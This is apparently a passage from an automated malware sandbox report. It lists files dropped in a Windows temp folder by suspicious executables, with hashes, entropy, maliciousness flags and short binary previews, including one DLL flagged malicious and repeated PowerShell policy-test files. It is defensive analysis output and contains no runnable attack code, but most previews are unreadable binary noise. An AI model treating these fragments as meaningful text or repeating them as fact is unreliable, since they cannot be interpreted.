SHA1:	BC56DFFBE17C015DB6676CF56996E29DF426AB92
SHA-256:	13229E0AD721D53BF9FB50FA66AE92C6C48F2ABB785F9E17A80E224E096028A4
SHA-512:	3FB6DA9993FBFC1DC3204DC2529FB7D9C6FE4E6F06E6C8E2DC0BE05CD0E990ED2643359F26EC433087C1A54C8E1C87D02013413CE8F4E1A6D2F380BE0F5EB09B
Malicious:	false
Preview:	....### explorer ###..[WIN]r[WIN]....### explorer ###..r

C:\Users\user\AppData\Local\Temp\Organizing

Download File

Process:	C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe
File Type:	data
Category:	dropped
Size (bytes):	239
Entropy (8bit):	4.917953550006691
Encrypted:	false
SSDEEP:	6:ox3FqjvVg3F+X32+hZCt7HSbYwClS6CSNN:63FyGSG+fCtJfjN
MD5:	28A97FEBFC5CD391BEC1E2A3D9D938BF
SHA1:	ADEA302B1D73D65C4C2A64F4F10955D5E4D728AA
SHA-256:	2528CD8D1353E6C4DBCC6D2226B5B50EF14027A962A49C4001D2C8C072904773
SHA-512:	7BBB7F7781C77740EFC6361C5195A01F854C3CA1AFD9EC7870C4F87C5A28432AF97D61A41E4AF0D2D3CEA45FA3565E297FC08CD7ACA91831792DF0A81EFE0F82
Malicious:	false
Preview:	profiles........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...

C:\Users\user\AppData\Local\Temp\Origin

Download File

Process:	C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe
File Type:	data
Category:	dropped
Size (bytes):	64512
Entropy (8bit):	4.7517361763863475
Encrypted:	false
SSDEEP:	384:+Oa3HwwuBcozc/mwftIQXoSpu88888888888888888888888888888zv888888NR:TaAwuXc/mex/Sg
MD5:	7BBDCF2829F157F4178AD1A4EA31BFE6
SHA1:	AFC7C5852F104D94FC2726B3230039B696F17FC2
SHA-256:	BAC794EE8129A6EDAA06FED424A8839D24B6B8E6A75C4F23BC8C3E7735498818
SHA-512:	D2DD73E8F2B965B9BF9BB806C639AF654646D76628E5C707F29EDE16A1634DD5A699FB239C83C4BCF492B03E2941129AFFC777C39B9851F948A96F537DC844FF
Malicious:	false
Preview:	.".......".......".......".......4.......'.......'.......'.......'.......'.......'...............................................Z.......Z.......Z.......Z.......Z.......Z.......Z...............=.......=.......=.......=.......=.......=.......K.......K.......K.......K.......\.......\.......\.......\.......E.......E.......E.......E.......E.......H.......H.......H.......H.......K.......................................!.......!.......!..?....!..?....!..?....!...A.......................J.......V.......d...............p.......~......................................................................................................................................C....!..GA...!..K....!.......!.......!.......!.......!...................................0...........!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......................................................:.......:.......:.......:......................................................................................

C:\Users\user\AppData\Local\Temp\Saved

Download File

Process:	C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe
File Type:	data
Category:	dropped
Size (bytes):	68465
Entropy (8bit):	7.005168590448056
Encrypted:	false
SSDEEP:	1536:uu0uZo2+9BGmdATGODv7xvTphAiPChgZ2kOE6:u4ZNoGmROL7F1G7ho2kOb
MD5:	53AB895BB726A4933DD1DC3F2FA2E5F8
SHA1:	3933C015286DE1871305AC17679D7244E0C73A07
SHA-256:	230C6C15BB57BCB9566D03A0940EB2D8CBB52FD2807CB195982C2541EF7EBBC2
SHA-512:	3FFB82FB40E8FF1D98D395601DE10BEB59AF9F77AF6300DBA79E2436EA787EE7DCE026DD43CDDA324515F81EC7B5F48E1DF396CFC3568128468C3CC5E663682B
Malicious:	false
Preview:	.".#"=.v......;aoG..{.i.l?#...<4.a0.k.&....CK..v..........io.w.......W$....d.O..%...G.........l...`qq..;....w.....x..L7..G.1...=].....vd..\Xq.:Uu...... "m@.....9.w....]..J.....bawS~.[]W`n......-..p?.>.H. ...l.J..i.E....v..kk....~..m......+.8uy..w.i...Gw6...P..e'..H.i.....8...].....V.....9.............\|..8.zc.kSY.=..T....'..l.qc:.\|..q.f.U..m;.t..[g...:.'"..Mrlw...~.....MR.X.,.q..,y.....7....Ns`g....(U.....<....P...=.8.[.....2.V.<.....:/..bb..z.+.....[.NT..... .vg.KG.]f.l..9..t....y1ZZZ\|"..{L.yPG..Z..m.r\|o7C.qW.cm..+.\.[..w.[....&.]=.....rlw..6;.T,...G..".....3T5 "}...T.Xl`Y./......OV][..`,[.9....FT.Vg3.vq....wD.orhg..C..:.l...........>U...e.T...V.......(Rm....sW.c1...N09....=.-...gx......IDZ........0..Z...q2U.,+`.....z.......H.Z...~.;.....^..oNpi\|.$\*[\|..$7g./.......Z...p.lQXw..........y..\w-.w.M.....K...w.....g..\|...'..+......%X,[.:...... ..=.+.e.#.Nc.'.}...W...c......n..+.l....b...vw..;.t.Q..J.S.a.@.P.>......E........~:\nr..y..

C:\Users\user\AppData\Local\Temp\Sensor

Download File

Process:	C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe
File Type:	data
Category:	dropped
Size (bytes):	118784
Entropy (8bit):	6.610127089636133
Encrypted:	false
SSDEEP:	3072:ywS2u5hVOoQ7t8T6pUkBJR8CThpmESv+AqVnBypIbv18mLtA:yb2j6AUkB0CThp6vmVnjpA
MD5:	3B125D59CE5A2CF242A621511A0FB164
SHA1:	3CCBA09F214B941931D6169CA9959ACE2A72ABA7
SHA-256:	E4C1FBEDC713173BCEF5C724F3D64283ADD852A64F65C87EB3EC8D86C55833AA
SHA-512:	C026F9AA8E83F2C888E2B8336C7EC8380D34873956407E32FAE31FD72BDA741B72C649B7162587435E3D13B9B9FAE8E0552330D710831C774264724C8589F36C
Malicious:	false
Preview:	xs.]..C<.M.;..t..4......V.M..t....M..i8....u=...y..A..~=.@<.M.;..t..4.....V.M..A....M..68....u..E.C;.\|....u.V...YY.M..4.......2._^[....V...N..V..F......t.Q......F..V..$..^.U..V.u.j......Y.M.Qj.VP.....p..0.......^].3..A.f.A..u......U..U.;.t".....B..A..B..A..B..A..B..A..B..A...]....A .......9.\|......S....A .......9A.\|..A....:...U.......3.V.u.W....f.F.9G ............P....I.....R........8E.t.8.....u.....u....8E.u.....u..F..8.....u.....u..F..8.....u.....u..F..8.[....................F.......Sh........I.....I......f..u.h..........f..t.....u....h........I......f..u.h..........f..t.....u..F..j.....I......f..u.j.......f..t.....u..F..j.....I......f..u.j.......f..t.....u..F..j[....I......f..u.j[......f..t.....u..F..[_..^....U..QQS..3.V..E.W.x.CO.&..e....xPW.....j0Y...f;.r...9w.+.....Ar...Fw...7....ar%..fw ..W........O.E.@.E.....E.\|....t..&.2....._^[..y..........<.......<-......<.......<#......<(t.<"t{<%tw<'ts<$to<&tk<!tg<otc<]t_<[t[<\tW<.tS<.tO<_tK<.tG<.tC<.t?<.t;<.t7<.t3<.t/<.t+<.

C:\Users\user\AppData\Local\Temp\Sheets

Download File

Process:	C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe
File Type:	data
Category:	dropped
Size (bytes):	62464
Entropy (8bit):	7.996893383300018
Encrypted:	true
SSDEEP:	1536:BUSTLYdN5/qM8GDI99k/fG3EwYkRinZI6I6+bit:u+L8H/pmk20DnZI6m2
MD5:	D947E72346C4AC1ABA8BBDE8BB791F6F
SHA1:	F6DC2CFFBC0B29502CBA42D9ADEE2263A7FF4835
SHA-256:	A6E6FC90D3C04E2461E3017E9F1DBAA27ABB9278F5DB7BB09A218A3A969FEB41
SHA-512:	61E4A6BFB253D4FCF21781324C6DD7B2DFF0750075BFE4CCAFFFF07A4D2FA552016DFB343BB835BFC7E7D6FD80B2B35B9519F2D6958885502758138BAB764E9C
Malicious:	false
Preview:	..({.....65."...f....k%. +......v.Y.H2....A;U...'.s....3..R_H......QG...&XKw.,.f.MB....6.&tI.G...J..V.P... ..]....R.l.N...r.+da..h...d...^.t...?K....cR....z...h0...8.sEt...i.h\|.c......F..LA.Y9.T.]_..!u...[e.#(.pN.t.0z..[U....N......K7.<..X..%..H..w.C.E."...\|....3...'..2.wi....?i..\(..8F. .s.T..#6...B.Hq..^..&XSgE.w.g....A0.<..w@.....M......r.M{......KP.V]...?......Qh...!....1..z .".$J..xCB^.T..7.....,....g^.tXs.f...gz%..........5o.."x..2.....Q.g.`=..1..A.. .....L.B.....H.....q.B.<.o."u.ud.7.....y\.....d.Eil.".,.cw..m...Ax!.]R...I..}...<.L...tj...._N.(..p...+v..3.....O..'V..).......L9M....sY...._..@..\|.&UC.!.J..Fp..).Nc.......\.......O.Ge.t.x...};.U.x.\|.R...._.3....2,,+..~..)d.h..?....b....@..5....3....x.b.W{.wB.......i.g..N./..Aq.y....k.9w.g.yx.l2.Y;h..`J..x.XT....80.F.......!.....?90.$.....[.....+'{W.D@.]."[.r.j_...BW.f/.re..hpe......U.....V4].X_.=..r.S.Du]Ak.a....@...AAj.B...}.\|:.`..-H=.......\|.q.tP..h.....g.8b}z4.G8^.<N...

C:\Users\user\AppData\Local\Temp\Show

Download File

Process:	C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe
File Type:	data
Category:	dropped
Size (bytes):	55296
Entropy (8bit):	6.654459170489211
Encrypted:	false
SSDEEP:	1536:XaSXL21rKoUn9r5C03Eq30BcrTrhCX4aVml:XtNPnj0nEoXnml
MD5:	35469FF6842A57BD9788DB58A1E1C0CC
SHA1:	47B76F8AE04AEFF8CDE18E15A6AB9D072214A54A
SHA-256:	7006A277A8B2AB82AE4409DF94E227083287B7678B9FFE79E2E19D534F1335EC
SHA-512:	3B97531E8D41C069DD9A8A6F3FE0FBC498FACBB6DF823525A726499CF5A4EA40879B7D02138C6D020520DF2D59C28EFC2F51470BF9AAC9F00B6F40101FE51AD0
Malicious:	false
Preview:	.....~..u..U...@.K..M.P.u..u.......T.U..M.;.r%;.v.;.v/.G.;.w(...}.;.v......;.w....F.;.r..u....Q.M.R.u..U..u..........E..e...;...@......+.@.E..E..@....8.E................U.G...;.v.}..E..M...........;..........}.......]....t1;.s.j.Xf.............B..u=3...@f...........B.(;.s.j.Xf....f.2..f.:..u.3.@f..j.X..f.2..........F..4F...f;.t........M...F..I...A.E...U..H...t4;H s#..+P.........;........E....;H r.U.3.f9C.......jwY..B...Bf9.t.;.r.;........M.....t.9X.t.....u..........M..].U..E.P.u....u..U......jw....g.....C...CXf9.t..T.....N......Q........E..$...E.3.f9D....,....).....F.f;.t.j.Yf;...j.Zf;.................F.j.Zf;.t...}........f.F......f#.....f;...f.F......f#......f;...............}............F..4F......F.f.............f;.u...F.....f;.t....:3.....u..u..U....u..u..9........t.G..F..4F...f;.t....8.......5..F..4F...f;.t..........1L..4F..F..4F...f;.t......jw[...3.B....1L...F.......;u.............I.^.E.#.E.\.A...............F.jwYf9.F..x.......f.~....h....E..GP..\....}..

C:\Users\user\AppData\Local\Temp\Silent

Download File

Process:	C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe
File Type:	data
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	6.555933383144663
Encrypted:	false
SSDEEP:	1536:65fhjLueoMmOrrHL/uDoiouK+r5bLmbZzW9FfTubT:ufhnueoMmOqDoioO5bLezW9FfTun
MD5:	04DF53FD74B69C92DBA8CD83EAFA1180
SHA1:	275765D9C7E3300C0B7579AE3DE32F658E12945C
SHA-256:	DB246122E92D7C13AE1050C65C1E1F722F4E98375C9875D719F775CFE1478EE9
SHA-512:	44DFA1CCF0C3B054DAC3FADBA5A87C7C56F318C74DFF83810310E349B80029F19A08133C502DD7B65E543B882E567AC19DE54F8A520FF073774894F6F8320EF5
Malicious:	false
Preview:	..@...Pjr...........9\$Dt......P....D$...@.Ph........3......B..\$0j.....D$4.\$<PW.u..D$L..........x .E....@....f.x..t...@...Pjr.p....L$0.&q......P....D$....f..A.......t$@.L$d.=...D$...P.D$$P.D$hP.u.S.;......L$`.....G....tp....Rt[...t9...t$...t..L$..D$0P....-.t$..L$4..H...:.L$..D$0P.......L$..D$0P.9H...t$..L$4.>.....t$..L$4..N...D$0P.L$$.....t$@.L$d..<...D$ ..P.D$dP.u.......L$`..."G...L$0.!p...Q.t$@.L$d.<...D$...P.D$$P.D$hP.u..t$ .J......L$`.....F...........t$...W.u..N......L$@.F...L$P.o...L$ .D$ ..I..?....t$$.....Y_^[..]...U..E...pSV3.x..W..u....E....].E..E...I..M.].]..].]..]..E......E...H...u..M..].]..F..E..........uF.E......@.Ph.......X....M...F...M...o...M..E...I......u.........9....F.j5Y.M....].f9K..]..M.u(.u..M.;..u..M.t..E..M..0..F.....F..M.B.....jG..B....u.^f;.u........}.......t...B.Ph.....R....M.U.R...P...u....F......@.Ph.....+......E.PSV...f............E......F........A...U.f;E.......jNXf;.......jGXf;....................A..AjNXf9E.u).y..u#j..E.

C:\Users\user\AppData\Local\Temp\Symptoms

Download File

Process:	C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe
File Type:	data
Category:	dropped
Size (bytes):	53248
Entropy (8bit):	6.721434698149147
Encrypted:	false
SSDEEP:	768:4Mf17+sVXnQkdFLILu8rbPDmhdimkIXqURPN2mldrfa04VQv7Qf0VosQE7YmFdno:Dh+I+FrbCyI7P4Cxi8q0vQEcmFdno
MD5:	7847E23CCE3770257DD905024CDC5020
SHA1:	2D2070CB134CCDE38544814A1E1E35A08AB95EA6
SHA-256:	75F0206860B962D3636015D98C420EC5EBF4023CA7B75B747AEB388AAFE9049A
SHA-512:	97F5B6924C23343F732AB470B8006EF2B25C92FADB3560FD56DB6E53B8DAF0C65CE66EB416BD03126C3B1AE6FA2CF66178A487C0EABAD24263A3DE7253C236B0
Malicious:	false
Preview:	Y;.t..u.S.3..Y;.u.W.....Y..u..u..7...Y^.u..].S.3...YY..u..E.j.Y..............[_]..U..W.u..~{..Y.M....I....u!...........E.j.Y.................E..@......t........".....E..@...t(.E..`...E..@.......E.t..H....E.j.Y....!..E.SVj.[.......E.j.Y....!..E..`...E..@......u1.u.j..2..Y;.t..u.S.2..Y;.u.W.....Y..u..u..$...Y.u..u.V.....YY..u..E.j.Y................^[_]..U..VW.u..hz..Y.M...I...........M.3..A..1+.@...E..H.I.H...~&.E.V.p.R..........E..H..E...3.;.....d...t....t.....?...k.0.....M......L..@( t.j.WWR.4..#......u..E.j.Y..........j..E.PR.$......H....@_^]..U..VW.u..y..Y.M...I...........M.3..A..1+.......E..H.....H...~(.E.V.p.R...........E..H.f.E.f..3.;.....f...t....t.....?...k.0.....M......L..@( t.j.WWR..3..#......u..E.j.Y..........j..E.PR.R.............@_^]..U..]./.....U..].5...j.h..L....3..u.E..0....Y.u..E....8........?k.0.....M..D.(.t!W.....YP....I...u.........0.I.................u..E.............\.......u.M..1.....Y..U.....E..M..E..E.E.P.u..E.P.D.....]..U..QV.u..

C:\Users\user\AppData\Local\Temp\UKzjyWlrjRLOjKNNlNHI.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1018899001\22b0b7688f.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	315803136
Entropy (8bit):	0.05424084145137839
Encrypted:	false
SSDEEP:	24576:PiF1SBe/VehmyxlQ6H3Gqzu8W5yvfwWen35+f+eVNcwan3llVE:vbWUgWenIftV+w8llVE
MD5:	FCF2600609013C43C081412CDEA7BB5A
SHA1:	36350F31DAE5860E581890B95D51C57A33C9BC9D
SHA-256:	9E90381883AE0254D0531DCC11B3DF43D109C34C7EFFBCBE10BD836B250BB531
SHA-512:	82F7893186917722988567C093F39B568DE9CA4AD986557079E3F3AF3E6FB625DE9F9DAA114FCDD82E2B62BB8A54F88AAF6249C62AA4D1339479E6AD6874F95F
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z.cg...........#...(...........................f.........................@............@... .........................`.......................................Hz...........................=.........................t............................text...8...........................`..`.data...............................@....rdata..............................@..@.eh_framX...........................@..@.bss.........p...........................edata..`............:..............@..@.idata...............<..............@....CRT....,............F..............@....tls.................H..............@....reloc..Hz.......\|...J..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Volunteer

Download File

Process:	C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe
File Type:	data
Category:	dropped
Size (bytes):	95232
Entropy (8bit):	4.612003853136968
Encrypted:	false
SSDEEP:
MD5:	D9EBAE5A1B2F513852F89FDC3D31672D
SHA1:	DFA418E6FD3C5B16B685EA0E09CC159A5FF6ED14
SHA-256:	B9A3C8E95D261CC9C6B28B58518554120AA2CFA09C2BE81C609C0F01B26B313D
SHA-512:	D5A9226EA1152566872669C4072BEA6498C930E405DB45FB6B7B63CD7A807BE814C7A71E983851F5D7A66B131319A850DDB10E1D4661D4CACD3082CB5C1CAEAC
Malicious:	false
Reputation:	unknown
Preview:	.........................................................................................................................................................................................................................................................................................................m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.................................(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(

C:\Users\user\AppData\Local\Temp\Wanting

Download File

Process:	C:\Users\user\AppData\Local\Temp\1018898001\0064eff6c8.exe
File Type:	data
Category:	dropped
Size (bytes):	41523
Entropy (8bit):	7.995572172924696
Encrypted:	true
SSDEEP:
MD5:	6F1A940A0159306F679FF4D03524AE0B
SHA1:	2B48523D0BF3828ABD8590E13A03B5946B3D442D
SHA-256:	7E294DD8F93A9A7D79FB118070F548D1E8FDA62FA96AF973E1A950F150B0331E
SHA-512:	4DDF0AFA24B981BAC3CA60CB52AF73E39BF7155972F49968C8FC85A17F561208D76158CD117948467176696A0BA87B9AC33658C5E7EF1EF3D4201139E959F932
Malicious:	false
Reputation:	unknown
Preview:	...._.....b@}.+....G.Qb._.._A...Q....u.V.^..-y.R...bP{..1..c_%..%.wt.oCbD.z.2.r'.-......V...h..g9S...e..K.ozJ6.d........F<;I.<nv.r..-.W.s"q.>A.`. ....]Q&[...B.......b(...... .7...{..,m1.%...I.%...&... .........&[.67.+..&..@.LV......B.C..W..2.y...Ji.L1..DY.h..6..z.B..n..K.A..P....1+J%..~.)....Q.M4.s.$..\X6..O...,_...V.7..O../........~.$yV(-.@...^.6..../.A.q..L.mN...B....S.NO...j.....iN.8........`...}.a.4..#>.....-..j\3.E0...6~...N...0.......T......c.c.5..H...@].Ax..P@...W=T.2(w_.......iRO'.wF......@L.)......T....Dp..z9.s......w .....^........o...n.W.a.V.^o.=..G..q..2.g<5....C.... .......S...BM."..MzHK...v.Z..H.........v?IT..f1.N.ts.....dIQ=.[..dWg.4OR;.h.x.P.i......Cj...@W.zg...L,...y.f25D...}M..5.]..NB!8.9..L*;..AT..z..?....)z.....Z....oA.WM.(..H.J......\|.4..2. ...9...e..g..z...[..2]-a.N,@..;......3...I$..#.9..Z9...<..[X...'m....>.../.....WPe.@.._...=P........\|`R...`..a.)...I(J.R......z. .......1B7..d.=..jy.q`&..4n..

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1xtbhf5o.ada.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2hxjr24i.kaq.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3vvx2bys.vdx.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ff3ss2ug.5hb.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gseenedn.lw0.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mdsmrbz1.3rs.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pclpl3pu.g13.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q3n04oaf.hgn.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ry0w2tey.imf.psm1

Download File

Process:	C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_spmwctm2.koj.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tbztqv13.0p0.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wemyp0ph.j1f.ps1

Download File

Process:	C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
